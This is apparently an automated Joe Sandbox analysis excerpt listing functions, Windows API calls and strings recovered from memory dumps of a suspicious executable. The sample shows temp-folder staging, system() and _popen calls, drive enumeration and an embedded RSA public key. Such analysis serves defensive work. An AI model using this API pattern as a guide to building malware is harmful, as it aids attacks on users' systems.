Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1FDF
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1FF8
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D202A
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D2060
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D207F
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D209F

SetUnhandledExceptionFilter.KERNEL32 ref: 00401285
malloc.MSVCRT ref: 0040134B
strlen.MSVCRT ref: 0040136B
malloc.MSVCRT ref: 00401376
memcpy.MSVCRT ref: 00401392

Part of subcall function 0057150F: GetTempPathA.KERNEL32 ref: 00571541
Part of subcall function 0057150F: SetCurrentDirectoryA.KERNELBASE ref: 00571567

_cexit.MSVCRT ref: 00401400
_amsg_exit.MSVCRT ref: 0040142C
_initterm.MSVCRT ref: 0040144E
GetStartupInfoA.KERNEL32 ref: 00401473
_initterm.MSVCRT ref: 0040149A
exit.MSVCRT ref: 004014AE

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 004012F9, Relevance: 7.6, APIs: 5, Instructions: 76

APIs

Part of subcall function 004D1C30: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004D1DCB
Part of subcall function 004D1C30: VirtualProtect.KERNEL32 ref: 004D1DFC
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1F38
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1F9F
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1FDF
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1FF8
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D202A
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D2060
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D207F
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D209F

SetUnhandledExceptionFilter.KERNEL32 ref: 00401285
malloc.MSVCRT ref: 0040134B
strlen.MSVCRT ref: 0040136B
malloc.MSVCRT ref: 00401376
memcpy.MSVCRT ref: 00401392

Part of subcall function 0057150F: GetTempPathA.KERNEL32 ref: 00571541
Part of subcall function 0057150F: SetCurrentDirectoryA.KERNELBASE ref: 00571567

_cexit.MSVCRT ref: 00401400
_amsg_exit.MSVCRT ref: 0040142C
_initterm.MSVCRT ref: 0040144E
GetStartupInfoA.KERNEL32 ref: 00401473
_initterm.MSVCRT ref: 0040149A
exit.MSVCRT ref: 004014AE

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004012E9, Relevance: 7.6, APIs: 5, Instructions: 73

APIs

Part of subcall function 004D1C30: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004D1DCB
Part of subcall function 004D1C30: VirtualProtect.KERNEL32 ref: 004D1DFC
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1F38
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1F9F
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1FDF
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1FF8
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D202A
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D2060
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D207F
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D209F

SetUnhandledExceptionFilter.KERNEL32 ref: 00401285
malloc.MSVCRT ref: 0040134B
strlen.MSVCRT ref: 0040136B
malloc.MSVCRT ref: 00401376
memcpy.MSVCRT ref: 00401392

Part of subcall function 0057150F: GetTempPathA.KERNEL32 ref: 00571541
Part of subcall function 0057150F: SetCurrentDirectoryA.KERNELBASE ref: 00571567

_cexit.MSVCRT ref: 00401400
_amsg_exit.MSVCRT ref: 0040142C
_initterm.MSVCRT ref: 0040144E
GetStartupInfoA.KERNEL32 ref: 00401473
_initterm.MSVCRT ref: 0040149A
exit.MSVCRT ref: 004014AE

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0057150F, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59

APIs

GetTempPathA.KERNEL32 ref: 00571541
SetCurrentDirectoryA.KERNELBASE ref: 00571567

Part of subcall function 004048E5: memcmp.MSVCRT ref: 0040490B

Part of subcall function 00401630: CreateDirectoryA.KERNELBASE(00000000,00000001,?,?,?,0CA30061,00000001,?,005715BA,?,00000000), ref: 004016A3
Part of subcall function 00401630: Sleep.KERNELBASE(00000000,00000000,?,005715BA,?,00000000), ref: 004016B2
Part of subcall function 00401630: system.MSVCRT ref: 00401745
Part of subcall function 00401630: system.MSVCRT ref: 00401765
Part of subcall function 00401630: GetLogicalDriveStringsA.KERNEL32(00000000,00000000), ref: 00401782

Strings

\BackupClient, xrefs: 0057154C
8"9, xrefs: 005715B0

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 00404972, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52

APIs

_popen.MSVCRT ref: 0040499B

Part of subcall function 00570390: malloc.MSVCRT ref: 005703A5
Part of subcall function 00570390: malloc.MSVCRT ref: 00570406

feof.MSVCRT ref: 004049D7
fgets.MSVCRT ref: 004049F5

Part of subcall function 00553D90: strlen.MSVCRT ref: 00553D9E

Strings

vG@, xrefs: 004049BF

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004D15E0, Relevance: 6.0, APIs: 4, Instructions: 48

APIs

_lock.MSVCRT ref: 004D1605
__dllonexit.MSVCRT ref: 004D1643
_unlock.MSVCRT ref: 004D1673
_onexit.MSVCRT ref: 004D1687

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00404A24, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

Sleep.KERNELBASE(005715BA), ref: 00404A35
time.MSVCRT ref: 00404A43
srand.MSVCRT ref: 00404A4B
rand.MSVCRT ref: 00404A62

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0057150F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59

APIs

GetTempPathA.KERNEL32 ref: 00571541
SetCurrentDirectoryA.KERNELBASE ref: 00571567

Part of subcall function 004048E5: memcmp.MSVCRT ref: 0040490B

Part of subcall function 00401630: CreateDirectoryA.KERNELBASE(00000000,00000001,?,?,?,0CA30061,00000001,?,005715BA,?,00000000), ref: 004016A3
Part of subcall function 00401630: Sleep.KERNELBASE(00000000,00000000,?,005715BA,?,00000000), ref: 004016B2
Part of subcall function 00401630: system.MSVCRT ref: 00401745
Part of subcall function 00401630: system.MSVCRT ref: 00401765
Part of subcall function 00401630: GetLogicalDriveStringsA.KERNEL32(00000000,00000000), ref: 00401782

Strings

\BackupClient, xrefs: 0057154C

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00404764, Relevance: 1.5, APIs: 1, Instructions: 8

APIs

_pclose.MSVCRT ref: 00404770

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Non-executed Functions

Function 004356C7, Relevance: 70.3, APIs: 22, Strings: 18, Instructions: 307

APIs

GetProcAddress.KERNEL32 ref: 004352EF
GetProcAddress.KERNEL32 ref: 00435301
GetProcAddress.KERNEL32 ref: 00435315
GetProcAddress.KERNEL32 ref: 00435329
GetProcAddress.KERNEL32 ref: 0043533D
GetProcAddress.KERNEL32 ref: 00435351
GetProcAddress.KERNEL32 ref: 00435365
GetProcAddress.KERNEL32 ref: 00435379
GetProcAddress.KERNEL32 ref: 0043538D
GetProcAddress.KERNEL32 ref: 004353A1
GetProcAddress.KERNEL32 ref: 004353B5
GetProcAddress.KERNEL32 ref: 004353C9
GetTickCount.KERNEL32 ref: 00435583
FreeLibrary.KERNEL32 ref: 00435653

Part of subcall function 00435040: GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00435661), ref: 0043504E
Part of subcall function 00435040: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,00000000,00435661), ref: 00435087

GlobalMemoryStatus.KERNEL32 ref: 0043566B
GetCurrentProcessId.KERNEL32 ref: 00435695
GetProcAddress.KERNEL32 ref: 004356F9
GetProcAddress.KERNEL32 ref: 0043570D
GetProcAddress.KERNEL32 ref: 00435721
GetVersion.KERNEL32 ref: 0043575E
GetVersion.KERNEL32 ref: 00435764
FreeLibrary.KERNEL32 ref: 004357BF
GetTickCount.KERNEL32 ref: 00435965
GetTickCount.KERNEL32 ref: 004359BE
GetTickCount.KERNEL32 ref: 00435B2C
CloseHandle.KERNEL32 ref: 00435BA6

Strings

Module32First, xrefs: 004353AA
Heap32ListFirst, xrefs: 00435332
Thread32Next, xrefs: 00435396
Process32Next, xrefs: 0043536E
Module32Next, xrefs: 004353BE
Heap32Next, xrefs: 0043531E
Heap32First, xrefs: 0043530A
Process32First, xrefs: 0043535A
, xrefs: 0043567D
$, xrefs: 004354F5
GetCursorInfo, xrefs: 00435702
Heap32ListNext, xrefs: 00435346
CreateToolhelp32Snapshot, xrefs: 004352E4
CloseToolhelp32Snapshot, xrefs: 004352F6
GetForegroundWindow, xrefs: 004356EE
Thread32First, xrefs: 00435382
USER32.DLL, xrefs: 004356D0
GetQueueStatus, xrefs: 00435716

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 00413770, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 89

APIs

GetStdHandle.KERNEL32 ref: 0041377F
GetFileType.KERNEL32 ref: 00413791
_vsnprintf.MSVCRT ref: 004137C7
GetVersion.KERNEL32 ref: 004137D5
MessageBoxA.USER32 ref: 0041388E

Part of subcall function 00413610: GetModuleHandleA.KERNEL32 ref: 00413638
Part of subcall function 00413610: GetProcAddress.KERNEL32 ref: 00413654
Part of subcall function 00413610: GetProcessWindowStation.USER32 ref: 00413670
Part of subcall function 00413610: GetUserObjectInformationW.USER32 ref: 004136A8
Part of subcall function 00413610: GetLastError.KERNEL32 ref: 004136B5
Part of subcall function 00413610: GetUserObjectInformationW.USER32 ref: 0041370D
Part of subcall function 00413610: wcsstr.MSVCRT ref: 00413736

RegisterEventSourceA.ADVAPI32 ref: 004137FF
ReportEventA.ADVAPI32 ref: 00413855
DeregisterEventSource.ADVAPI32 ref: 00413861
_vsnprintf.MSVCRT ref: 004138C5
WriteFile.KERNEL32 ref: 004138F0

Strings

OpenSSL, xrefs: 004137F0
OpenSSL: FATAL, xrefs: 0041387F

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 00401500, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 64

APIs

GetModuleHandleA.KERNEL32 ref: 00401516
LoadLibraryA.KERNEL32 ref: 0040152C
GetModuleHandleA.KERNEL32 ref: 00401592
GetProcAddress.KERNEL32 ref: 004015AB

Strings

__register_frame_info, xrefs: 00401540
libgcc_s_dw2-1.dll, xrefs: 0040150F, 00401525
__deregister_frame_info, xrefs: 00401558
_Jv_RegisterClasses, xrefs: 004015A0
libgcj-16.dll, xrefs: 0040158B
P`M, xrefs: 00401568

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 004156B0, Relevance: 7.6, Strings: 6, Instructions: 130

Strings

Auth, xrefs: 00415705
enti, xrefs: 00415710
ineI, xrefs: 004156E9
Genu, xrefs: 004156DE
cAMD, xrefs: 0041571B
ntel, xrefs: 004156F4

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 004D1780, Relevance: 7.6, APIs: 5, Instructions: 55

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 004D17B9
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014D2), ref: 004D17CA
GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014D2), ref: 004D17D2
GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014D2), ref: 004D17DA
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014D2), ref: 004D17E9

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 00405600, Relevance: 1.3, Strings: 1, Instructions: 22

Strings

-----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO, xrefs: 00405600

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 004E6ED0, Relevance: .0, Instructions: 13

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 0045BED7, Relevance: .0, Instructions: 12

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 00415857, Relevance: .0, Instructions: 9

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 004358AC, Relevance: 54.5, APIs: 17, Strings: 14, Instructions: 265

APIs

GetProcAddress.KERNEL32 ref: 004352EF
GetProcAddress.KERNEL32 ref: 00435301
GetProcAddress.KERNEL32 ref: 00435315
GetProcAddress.KERNEL32 ref: 00435329
GetProcAddress.KERNEL32 ref: 0043533D
GetProcAddress.KERNEL32 ref: 00435351
GetProcAddress.KERNEL32 ref: 00435365
GetProcAddress.KERNEL32 ref: 00435379
GetProcAddress.KERNEL32 ref: 0043538D
GetProcAddress.KERNEL32 ref: 004353A1
GetProcAddress.KERNEL32 ref: 004353B5
GetProcAddress.KERNEL32 ref: 004353C9
GetTickCount.KERNEL32 ref: 00435583
FreeLibrary.KERNEL32 ref: 00435653

Part of subcall function 00435040: GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00435661), ref: 0043504E
Part of subcall function 00435040: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,00000000,00435661), ref: 00435087

GlobalMemoryStatus.KERNEL32 ref: 0043566B
GetCurrentProcessId.KERNEL32 ref: 00435695
FreeLibrary.KERNEL32 ref: 004357BF
GetTickCount.KERNEL32 ref: 00435965
GetTickCount.KERNEL32 ref: 004359BE
GetTickCount.KERNEL32 ref: 00435B2C
CloseHandle.KERNEL32 ref: 00435BA6

Strings

Heap32ListFirst, xrefs: 00435332
CreateToolhelp32Snapshot, xrefs: 004352E4
Heap32First, xrefs: 0043530A
Heap32ListNext, xrefs: 00435346
Module32First, xrefs: 004353AA
Thread32First, xrefs: 00435382
CloseToolhelp32Snapshot, xrefs: 004352F6
$, xrefs: 004354F5
Process32Next, xrefs: 0043536E
Heap32Next, xrefs: 0043531E
Thread32Next, xrefs: 00435396
Module32Next, xrefs: 004353BE
, xrefs: 0043567D
Process32First, xrefs: 0043535A

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E8960, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 114

APIs

memcpy.MSVCRT ref: 004E89D1
fwrite.MSVCRT ref: 004E8A70
fputs.MSVCRT ref: 004E8A8B
fwrite.MSVCRT ref: 004E8AB3
fputs.MSVCRT ref: 004E8AC7
fwrite.MSVCRT ref: 004E8AF1
abort.MSVCRT ref: 004E8AF6
free.MSVCRT ref: 004E8AFE
abort.MSVCRT ref: 004E8B78
fwrite.MSVCRT ref: 004E8BA0

Part of subcall function 004D1460: strlen.MSVCRT ref: 004D14F5
Part of subcall function 004D1460: memcpy.MSVCRT ref: 004D1510
Part of subcall function 004D1460: free.MSVCRT(?,?,?,?,?,?,?,?,?,004E8A4B), ref: 004D151A
Part of subcall function 004D1460: free.MSVCRT(?,?,?,?,?,?,?,?,?,004E8A4B), ref: 004D1543
Part of subcall function 004D1460: free.MSVCRT(?,?,?,?,?,?,?,?,?,004E8A4B), ref: 004D1587

Strings

terminate called after throwing an instance of ', xrefs: 004E8A62
-, xrefs: 004E8B82
terminate called without an active exception, xrefs: 004E8B92
terminate called recursively, xrefs: 004E8AE3
not enough space for format expansion (Please submit full bug report at http://gcc.gnu.org/bugs.html): , xrefs: 004E8971

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0045ECD0, Relevance: 24.3, APIs: 4, Strings: 12, Instructions: 345

APIs

Part of subcall function 00456A70: strlen.MSVCRT ref: 00456A86
Part of subcall function 00456A70: isupper.MSVCRT ref: 00456AF2
Part of subcall function 00456A70: tolower.MSVCRT ref: 00456AFF
Part of subcall function 00456A70: isupper.MSVCRT ref: 00456B0F

memcpy.MSVCRT ref: 0045EF43
strlen.MSVCRT ref: 0045EFF9
memcpy.MSVCRT ref: 0045F05A

Part of subcall function 00431E00: GetLastError.KERNEL32 ref: 00431E62
Part of subcall function 00431E00: _errno.MSVCRT ref: 00431ECA
Part of subcall function 00431E00: _errno.MSVCRT ref: 00431ED1
Part of subcall function 00431E00: fclose.MSVCRT ref: 00431F46

memcpy.MSVCRT ref: 0045F121

Strings

,name:, xrefs: 0045ED50, 0045EE74, 0045F1EE
~, xrefs: 0045F25A
,value:, xrefs: 0045ED41, 0045EE65, 0045F1DF
section:, xrefs: 0045ED5E, 0045EE82, 0045F1FC
text:, xrefs: 0045EE22
file:, xrefs: 0045EE0E
v3_pci.c, xrefs: 0045ED1A, 0045EDB6, 0045EE3E, 0045EEFE, 0045EFA5, 0045EFDE, 0045F013, 0045F0DC, 0045F17E, 0045F1B6, 0045F245, 0045F262, 0045F2CD
hex:, xrefs: 0045EDFA
pathlen, xrefs: 0045ED88
policy, xrefs: 0045EDD0
language, xrefs: 0045ECD2
, xrefs: 0045F2D5

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 00449EC0, Relevance: 24.2, APIs: 1, Strings: 15, Instructions: 248

APIs

Part of subcall function 004496B0: strlen.MSVCRT ref: 00449771
Part of subcall function 004496B0: memcpy.MSVCRT ref: 0044982E
Part of subcall function 004496B0: memcpy.MSVCRT ref: 00449912
Part of subcall function 004496B0: strlen.MSVCRT ref: 00449B46
Part of subcall function 004496B0: strncmp.MSVCRT ref: 00449B6B

strcmp.MSVCRT ref: 00449F25

Part of subcall function 00449E60: strlen.MSVCRT ref: 00449E71
Part of subcall function 00449E60: strlen.MSVCRT ref: 00449E7B
Part of subcall function 00449E60: strcmp.MSVCRT ref: 00449E94

Part of subcall function 00445D40: strlen.MSVCRT ref: 00445DD8
Part of subcall function 00445D40: _strnicmp.MSVCRT ref: 00445E3F
Part of subcall function 00445D40: strlen.MSVCRT ref: 00445E57

Strings

CERTIFICATE REQUEST, xrefs: 0044A0D5
TRUSTED CERTIFICATE, xrefs: 0044A0F9, 0044A176
PRIVATE KEY, xrefs: 00449F52, 00449F62
Expecting: , xrefs: 0044A159
PARAMETERS, xrefs: 00449FF0, 0044A000
X9.42 DH PARAMETERS, xrefs: 0044A070
DH PARAMETERS, xrefs: 0044A080
NEW CERTIFICATE REQUEST, xrefs: 0044A0C5
ENCRYPTED PRIVATE KEY, xrefs: 00449F42
PKCS7, xrefs: 0044A114, 0044A1A1, 0044A1BA
X509 CERTIFICATE, xrefs: 0044A094
CMS, xrefs: 0044A121
PKCS #7 SIGNED DATA, xrefs: 0044A18A
CERTIFICATE, xrefs: 0044A0B1, 0044A0E9
ANY PRIVATE KEY, xrefs: 00449F2E

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004682D0, Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 380

APIs

memchr.MSVCRT ref: 0046847D
isspace.MSVCRT ref: 00468573
isspace.MSVCRT ref: 0046868D
isspace.MSVCRT ref: 004686C0
strtoul.MSVCRT ref: 004686EA
isspace.MSVCRT ref: 00468731
strlen.MSVCRT ref: 00468746
isspace.MSVCRT ref: 00468774

Strings

Code=, xrefs: 004687D5, 004688AE
ocsp_ht.c, xrefs: 0046858F, 00468794
,Reason=, xrefs: 004687C9
v, xrefs: 004687A4
r, xrefs: 0046879C

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
